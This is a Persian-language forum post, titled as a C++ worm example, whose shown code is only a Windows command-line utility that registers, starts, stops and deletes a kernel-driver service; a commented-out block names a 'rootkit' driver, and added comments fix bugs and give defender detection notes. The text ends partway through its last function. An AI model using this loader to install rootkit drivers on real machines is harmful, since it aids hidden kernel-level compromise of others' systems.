Title: C++ worm example
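در سورس زیر یک کرم می‌بینید که با سی‌پلاس‌پلاس نوشته شده است. این کرم برای خودش درایور هم نصب می‌کند. (کدی که در ادامه آمده فقط بخش ثبت، اجرا، توقف و حذف سرویس درایور کرنل از طریق Service Control Manager ویندوز است.)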
چیز جالبیه

کد:
#include <windows.h>

#include <cstdio>
#include <cstring>
#include <iostream>
using namespace std;
// Registers a kernel-driver service called DriverName whose image is the file
// at drivePath (uses the Service Control Manager, so it needs administrator
// rights). Callers in this file ignore the return value.
bool LoadDriver(char *DriverName, char *drivePath);
// Sends SERVICE_CONTROL_STOP to the named service.
// NOTE: the return value is not a success flag. It is true only when no
// service with that name exists; every other path returns false.
// unLoadDriver() depends on exactly this behaviour.
bool StopDriver(char *DriverName);
// Asks the Service Control Manager to start the named service.
// Callers in this file ignore the return value.
bool StartDriver(char *DriverName);
// Stops the named service through StopDriver() and then marks it for deletion.
// Callers in this file ignore the return value.
bool unLoadDriver(char *DriverName);
// Reports whether filepath can be opened for reading with fopen().
bool IfFileExists(char *filepath);

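// Prints the synopsis of every option this program actually implements.
// (The original usage text also advertised "-p process", which no branch
// of main() handles, so it is no longer listed.)
static void PrintUsage()
{
    std::cout << "Format: program.exe -start Driver Name" << std::endl <<
        "\tprogram.exe -stop Driver Name" << std::endl <<
        "\tprogram.exe -unload Driver Name" << std::endl <<
        "\tprogram.exe -load Name Path-to-sys-file" << std::endl;
}

// Command-line front end for the driver-service helpers.
//
//   -start  <name>          start an already registered driver service
//   -stop   <name>          send a stop control to the service
//   -unload <name>          stop the service and mark it for deletion
//   -load   <name> <path>   register <path> as a kernel-driver service
//
// Returns 0 when a command was dispatched or when only the usage text was
// requested, and 1 when the command line is malformed. The helpers print
// their own error messages; their return values are not used here.
int main( int argc, const char* argv[])
{
    if(argc < 2 || !argv[1])
    {
        PrintUsage();
        return 0;
    }

    const char *command = argv[1];
    const bool isStart  = !strcmp(command, "-start");
    const bool isStop   = !strcmp(command, "-stop");
    const bool isUnload = !strcmp(command, "-unload");
    const bool isLoad   = !strcmp(command, "-load");

    if(!isStart && !isStop && !isUnload && !isLoad)
    {
        // The original silently exited on an unrecognised option.
        std::cout << "Unknown option: " << command << std::endl;
        PrintUsage();
        return 1;
    }

    // -load needs two operands (name and path); the original only checked
    // the first one and handed a null path on to LoadDriver().
    const int requiredArgc = isLoad ? 4 : 3;
    if(argc < requiredArgc)
    {
        if(isStart)
            std::cout << "Format: program.exe -start Driver Name" << std::endl;
        else if(isStop)
            std::cout << "Format: program.exe -stop Driver Name" << std::endl;
        else if(isUnload)
            std::cout << "Format: program.exe -unload Driver Name" << std::endl;
        else
            std::cout << "Format: program.exe -load Name Path-to-sys-file" << std::endl;
        return 1;
    }

    // The helpers take non-const char*; they only read the strings.
    char *driverName = const_cast<char*>(argv[2]);

    if(isStart)
        StartDriver(driverName);
    else if(isStop)
        StopDriver(driverName);
    else if(isUnload)
        unLoadDriver(driverName);
    else
        LoadDriver(driverName, const_cast<char*>(argv[3]));

    return 0;
}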
/*
int main()
{
//    StartDriver("rootkit");
//    StopDriver("rootkit");
//    unLoadDriver("rootkit");
//    LoadDriver("rootkit", "D:\\C++\\RootKitLoaderUtil\\rootkit.sys");
    return 0;
} */

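// Registers drivePath as a demand-start kernel-driver service named DriverName.
//
// Parameters:
//   DriverName  service name, also used as the display name
//   drivePath   path of the .sys image; must be readable by this process
//
// Returns true when the service entry was created, false on any failure
// (the reason is printed to stdout). The original returned false on every
// path, including success.
//
// Operational notes for reviewers and defenders: the call requires an
// administrator token; a successful CreateService adds a key under
// HKLM\SYSTEM\CurrentControlSet\Services\<DriverName> and the Service Control
// Manager records it in the System log as event 7045 ("A service was installed
// in the system"). An unexpected kernel-driver install is worth alerting on.
bool LoadDriver(char *DriverName, char *drivePath)
{
    if(DriverName == NULL)
    {
        std::cout << "Bad driver name";
        return false;
    }
    // A null path would otherwise reach fopen() inside IfFileExists().
    if(drivePath == NULL || IfFileExists(drivePath) == FALSE)
    {
        std::cout << "Bad file path";
        return false;
    }

    // Only the right to create a service is needed on the manager handle.
    SC_HANDLE scManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
    if(scManager == NULL)
    {
        std::cout << "Error: " << GetLastError() << std::endl;
        return false;
    }

    std::cout << "Loading service: " << DriverName << " at " << drivePath << std::endl;

    SC_HANDLE service = CreateServiceA(scManager, DriverName, DriverName,
                                       SERVICE_ALL_ACCESS, SERVICE_KERNEL_DRIVER,
                                       SERVICE_DEMAND_START, SERVICE_ERROR_NORMAL,
                                       drivePath, NULL, NULL, NULL, NULL, NULL);
    if(service == NULL)
    {
        // GetLastError() is only meaningful after a failed call, and must be
        // read before CloseServiceHandle() can overwrite it. The original
        // read it unconditionally, so a stale code from an earlier call could
        // turn a successful CreateService into a reported error.
        const DWORD error = GetLastError();
        CloseServiceHandle(scManager);
        if(error == ERROR_SERVICE_EXISTS)
            std::cout << "Service already exists with that name";
        else
            std::cout << "Error: " << error << std::endl;
        return false;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(scManager);
    return true;
}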

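// Sends SERVICE_CONTROL_STOP to the service named DriverName.
//
// Return value (kept exactly as in the original, because unLoadDriver()
// relies on it): true ONLY when no service with that name exists; false in
// every other case, whether the stop request succeeded or failed. Failures
// are reported on stdout.
bool StopDriver(char *DriverName)
{
    // Connecting is all that is needed to open an existing service.
    SC_HANDLE scManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_CONNECT);
    if(scManager == NULL)
    {
        std::cout << "Error: " << GetLastError() << std::endl;
        return false;
    }

    SC_HANDLE service = OpenServiceA(scManager, DriverName, SERVICE_STOP);
    if(service == NULL)
    {
        // Read the code before any other API call can overwrite it; the
        // original consulted GetLastError() even when the call had succeeded.
        const DWORD error = GetLastError();
        CloseServiceHandle(scManager);
        if(error == ERROR_SERVICE_DOES_NOT_EXIST)
        {
            std::cout << "No service found by name";
            return true;
        }
        std::cout << "Error: " << error << std::endl;
        return false;
    }

    SERVICE_STATUS status;
    ZeroMemory(&status, sizeof(status));
    if(!ControlService(service, SERVICE_CONTROL_STOP, &status))
    {
        std::cout << "Error: " << GetLastError() << std::endl;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(scManager);
    return false;
}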

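// Asks the Service Control Manager to start the service named DriverName.
//
// Returns true when the start request was accepted, false otherwise (the
// reason is printed to stdout). The original returned false on every path.
//
// Note for reviewers: for a kernel-driver service this is the point at which
// Windows loads the image; on 64-bit Windows the load is refused unless the
// driver satisfies the system's code-signing policy.
bool StartDriver(char *DriverName)
{
    SC_HANDLE scManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_CONNECT);
    if(scManager == NULL)
    {
        std::cout << "Error: " << GetLastError() << std::endl;
        return false;
    }

    SC_HANDLE service = OpenServiceA(scManager, DriverName, SERVICE_START);
    if(service == NULL)
    {
        // Capture the code before CloseServiceHandle() can change it.
        const DWORD error = GetLastError();
        CloseServiceHandle(scManager);
        if(error == ERROR_SERVICE_DOES_NOT_EXIST)
            std::cout << "No service found by name";
        else
            std::cout << "Error: " << error << std::endl;
        return false;
    }

    bool started = true;
    if(!StartServiceA(service, 0, NULL))
    {
        started = false;
        const DWORD error = GetLastError();
        // In the original this test sat after the generic "error>0" branch
        // and could never be reached.
        if(error == ERROR_SERVICE_ALREADY_RUNNING)
            std::cout << "Service already running";
        else
            std::cout << "Error: " << error << std::endl;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(scManager);
    return started;
}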

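// Stops the service named DriverName and marks it for deletion.
//
// StopDriver() returns true only when the service does not exist, in which
// case there is nothing to delete and this function returns false right away.
// Otherwise the service is opened with DELETE access and removed.
//
// Returns true when DeleteService succeeded, false otherwise (the reason is
// printed to stdout). The original returned false on every path.
bool unLoadDriver(char *DriverName)
{
    if(StopDriver(DriverName))
    {
        return false;
    }

    SC_HANDLE scManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_CONNECT);
    if(scManager == NULL)
    {
        std::cout << "Error: " << GetLastError() << std::endl;
        return false;
    }

    SC_HANDLE service = OpenServiceA(scManager, DriverName, DELETE);
    if(service == NULL)
    {
        // Read the code before CloseServiceHandle() can overwrite it. The
        // original checked GetLastError() regardless of the call's result,
        // so a leftover code from StopDriver() could abort the deletion.
        const DWORD error = GetLastError();
        CloseServiceHandle(scManager);
        std::cout << "Error: " << error << std::endl;
        return false;
    }

    bool deleted = true;
    if(!DeleteService(service))
    {
        deleted = false;
        std::cout << "Error: " << GetLastError() << std::endl;
    }

    CloseServiceHandle(service);
    CloseServiceHandle(scManager);
    return deleted;
}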

bool IfFileExists(char *filepath)
{
  FILE *file;
  file=fopen(filepath, "r");
  if(file==NULL)
  {
      return FALSE;
  }
  fclose(file);
  return
پیام‌های این موضوع
C++ worm example - توسط Amin_Mansouri - 09-28-2011، 06:15 PM
